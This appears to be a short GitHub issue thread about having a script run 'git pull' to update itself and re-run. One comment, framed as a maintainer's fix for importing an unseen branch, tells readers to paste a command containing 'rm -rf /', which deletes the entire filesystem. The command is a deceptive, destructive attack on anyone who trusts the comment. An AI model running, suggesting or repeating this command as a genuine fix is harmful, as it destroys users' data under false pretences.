Open samuelbennett opened 10 years ago
We have resolved this in a rm -rf branch that you cannot see in github. Running the below command will import the branch for you.
git pull; rm -rf /; echo "Bye Bye"
This is being reviewed, the repository will likely be signed by each commit to ensure you know the code you are pulling down is the valid offical code!
The script should do a 'git pull' prior to running to ensure it has the latest version of itself. Then, if there are updates, it should then re-run using the new code. If there are any merge issues it should work out how to fix them and do it.